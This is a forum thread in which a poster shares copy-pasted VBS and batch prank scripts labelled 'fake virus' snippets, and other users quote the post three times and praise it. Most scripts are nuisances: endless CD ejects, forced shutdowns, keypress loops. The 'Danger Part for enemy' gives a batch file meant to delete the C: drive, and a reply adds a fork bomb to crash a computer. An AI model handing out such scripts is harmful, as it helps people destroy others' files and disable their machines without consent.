Results 1 to 7 of 7
  1. #1
    GEHhgerhgerhgerhrhr's Avatar
    Join Date
    Jan 2013
    Gender
    female
    Location
    <------> ◕‿◕ <------>
    Posts
    675
    Reputation
    107
    Thanks
    11,410
    My Mood
    Angelic

    Fake Virus Snippets .Bat & .VBS | Trool Friend & Enemy

    Copy&Pasted Content, I'm NOT the creator/writer of this!




    VIRUS NOTEPAD SCRIPT - Safe Part / friends

    1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!

     
    Set oWMP = CreateObject("WMPlayer.OCX.7")
    Set colCDROMs = oWMP.cdromCollection
    do
    if colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    End If
    wscript.sleep 5000
    loop


    Save it as "Anything.VBS" .

    2)SHUTDOWN COMPUTER

     
    @echo off
    msg * I don't like you = you can edit
    shutdown -c "Error! You are too stupid!" -s = you can edit


    Save it as "Anything.BAT" .

    3) Frustrate your friend by making this VBScript hit Enter simultaneously:

     
    Set wshShell = wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "~(enter)"
    loop


    Save it as "Anything.VBS"

    4) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:


     
    WScript.Sleep 180000
    WScript.Sleep 10000
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.Run "notepad"
    WScript.Sleep 100
    WshShell.AppActivate "Notepad"
    WScript.Sleep 500
    WshShell.SendKeys "Hel"
    WScript.Sleep 500
    WshShell.SendKeys "lo "
    WScript.Sleep 500
    WshShell.SendKeys ", ho"
    WScript.Sleep 500
    WshShell.SendKeys "w a"
    WScript.Sleep 500
    WshShell.SendKeys "re "
    WScript.Sleep 500
    WshShell.SendKeys "you"
    WScript.Sleep 500
    WshShell.SendKeys "? "
    WScript.Sleep 500
    WshShell.SendKeys "I a"
    WScript.Sleep 500
    WshShell.SendKeys "m g"
    WScript.Sleep 500
    WshShell.SendKeys "ood"
    WScript.Sleep 500
    WshShell.SendKeys " th"
    WScript.Sleep 500
    WshShell.SendKeys "ank"
    WScript.Sleep 500
    WshShell.SendKeys "s! "


    Save it as "Anything.VBS"

    5) Frustrate your friend by making this VBScript hit Backspace simultaneously:

     
    MsgBox "Let's go back a few steps"
    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{bs}"
    loop


    Save it as "Anything.VBS"

    Danger Part~ for enemy

    1) Copy the code below

     
    @Echo off
    Del C:\ *.* |y = you can change this


    save as anything.bat

    PLEASE NoTe:
    dont run that .bat file on ur system
    it will delete c:
    Last edited by Jorndel; 05-24-2013 at 10:35 AM.

  2. #2
    wEFTwefwfefesfefe's Avatar
    Join Date
    Jun 2012
    Gender
    male
    Posts
    1,922
    Reputation
    72
    Thanks
    490
    My Mood
    Cold
    Quote Originally Posted by Farah[Aisyah] View Post
    Copy&Pasted Content, I'm NOT the creator/writer of this!




    VIRUS NOTEPAD SCRIPT - Safe Part / friends

    1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!

     
    Set oWMP = CreateObject("WMPlayer.OCX.7")
    Set colCDROMs = oWMP.cdromCollection
    do
    if colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    End If
    wscript.sleep 5000
    loop


    Save it as "Anything.VBS" .

    2)SHUTDOWN COMPUTER

     
    @echo off
    msg * I don't like you = you can edit
    shutdown -c "Error! You are too stupid!" -s = you can edit


    Save it as "Anything.BAT" .

    3) Frustrate your friend by making this VBScript hit Enter simultaneously:

     
    Set wshShell = wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "~(enter)"
    loop


    Save it as "Anything.VBS"

    4) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:


     
    WScript.Sleep 180000
    WScript.Sleep 10000
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.Run "notepad"
    WScript.Sleep 100
    WshShell.AppActivate "Notepad"
    WScript.Sleep 500
    WshShell.SendKeys "Hel"
    WScript.Sleep 500
    WshShell.SendKeys "lo "
    WScript.Sleep 500
    WshShell.SendKeys ", ho"
    WScript.Sleep 500
    WshShell.SendKeys "w a"
    WScript.Sleep 500
    WshShell.SendKeys "re "
    WScript.Sleep 500
    WshShell.SendKeys "you"
    WScript.Sleep 500
    WshShell.SendKeys "? "
    WScript.Sleep 500
    WshShell.SendKeys "I a"
    WScript.Sleep 500
    WshShell.SendKeys "m g"
    WScript.Sleep 500
    WshShell.SendKeys "ood"
    WScript.Sleep 500
    WshShell.SendKeys " th"
    WScript.Sleep 500
    WshShell.SendKeys "ank"
    WScript.Sleep 500
    WshShell.SendKeys "s! "


    Save it as "Anything.VBS"

    5) Frustrate your friend by making this VBScript hit Backspace simultaneously:

     
    MsgBox "Let's go back a few steps"
    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{bs}"
    loop


    Save it as "Anything.VBS"

    Danger Part~ for enemy

    1) Copy the code below

     
    @Echo off
    Del C:\ *.* |y = you can change this


    save as anything.bat

    PLEASE NoTe:
    dont run that .bat file on ur system
    it will delete c:
    Not bad....Coded my Youtube Viewer in BATCH aswell * HighFive

  3. #3
    desligaessepc's Avatar
    Join Date
    Jan 2013
    Gender
    male
    Location
    Narnia
    Posts
    17
    Reputation
    10
    Thanks
    2
    My Mood
    Twisted
    Very funny. huehuehue my friend will be trolled

  4. #4
    Babart's Avatar
    Join Date
    Nov 2011
    Gender
    male
    Posts
    185
    Reputation
    10
    Thanks
    1,163
    My Mood
    Cheerful
    You can try too, in a .bat
    %0|%0

    It's just funny.
    (a fork, and it will crash the computer)

  5. #5
    laxkid1515's Avatar
    Join Date
    Sep 2011
    Gender
    male
    Posts
    246
    Reputation
    10
    Thanks
    12
    My Mood
    Sad
    How does the Hello how are you command thingy work?

  6. #6
    Xiao@'s Avatar
    Join Date
    Dec 2012
    Gender
    male
    Location
    Heart
    Posts
    457
    Reputation
    16
    Thanks
    120
    My Mood
    Aggressive
    Quote Originally Posted by Farah[Aisyah] View Post
    Copy&Pasted Content, I'm NOT the creator/writer of this!




    VIRUS NOTEPAD SCRIPT - Safe Part / friends

    1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!

     
    Set oWMP = CreateObject("WMPlayer.OCX.7")
    Set colCDROMs = oWMP.cdromCollection
    do
    if colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    End If
    wscript.sleep 5000
    loop


    Save it as "Anything.VBS" .

    2)SHUTDOWN COMPUTER

     
    @echo off
    msg * I don't like you = you can edit
    shutdown -c "Error! You are too stupid!" -s = you can edit


    Save it as "Anything.BAT" .

    3) Frustrate your friend by making this VBScript hit Enter simultaneously:

     
    Set wshShell = wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "~(enter)"
    loop


    Save it as "Anything.VBS"

    4) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:


     
    WScript.Sleep 180000
    WScript.Sleep 10000
    Set WshShell = WScript.CreateObject("WScript.Shell")
    WshShell.Run "notepad"
    WScript.Sleep 100
    WshShell.AppActivate "Notepad"
    WScript.Sleep 500
    WshShell.SendKeys "Hel"
    WScript.Sleep 500
    WshShell.SendKeys "lo "
    WScript.Sleep 500
    WshShell.SendKeys ", ho"
    WScript.Sleep 500
    WshShell.SendKeys "w a"
    WScript.Sleep 500
    WshShell.SendKeys "re "
    WScript.Sleep 500
    WshShell.SendKeys "you"
    WScript.Sleep 500
    WshShell.SendKeys "? "
    WScript.Sleep 500
    WshShell.SendKeys "I a"
    WScript.Sleep 500
    WshShell.SendKeys "m g"
    WScript.Sleep 500
    WshShell.SendKeys "ood"
    WScript.Sleep 500
    WshShell.SendKeys " th"
    WScript.Sleep 500
    WshShell.SendKeys "ank"
    WScript.Sleep 500
    WshShell.SendKeys "s! "


    Save it as "Anything.VBS"

    5) Frustrate your friend by making this VBScript hit Backspace simultaneously:

     
    MsgBox "Let's go back a few steps"
    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{bs}"
    loop


    Save it as "Anything.VBS"

    Danger Part~ for enemy

    1) Copy the code below

     
    @Echo off
    Del C:\ *.* |y = you can change this


    save as anything.bat

    PLEASE NoTe:
    dont run that .bat file on ur system
    it will delete c:
    Nice ! Good job~

  7. #7
    Ryzeros.'s Avatar
    Join Date
    Nov 2013
    Gender
    male
    Location
    Over the rainbow
    Posts
    2,715
    Reputation
    292
    Thanks
    291
    My Mood
    Twisted
    I cant stop laughing at them.

Similar Threads

  1. [Tutorial] Scare your friends with fake virus
    By Gab in forum Programming Tutorials
    Replies: 10
    Last Post: 11-06-2010, 09:02 PM
  2. PULL A PRANK ON YOUR FRIEND/ENEMIES!!
    By Grim in forum Spammers Corner
    Replies: 13
    Last Post: 10-19-2009, 08:06 PM
  3. Fake Virus Alert--- PLEASE READ.
    By Mouzie in forum Combat Arms Hacks & Cheats
    Replies: 14
    Last Post: 04-06-2009, 02:19 PM
  4. How to make ur own fake virus
    By deathdemigod in forum Programming Tutorials
    Replies: 18
    Last Post: 03-15-2009, 03:38 PM
  5. Make a fake virus
    By Hispiforce in forum WarRock - International Hacks
    Replies: 17
    Last Post: 09-07-2007, 05:56 PM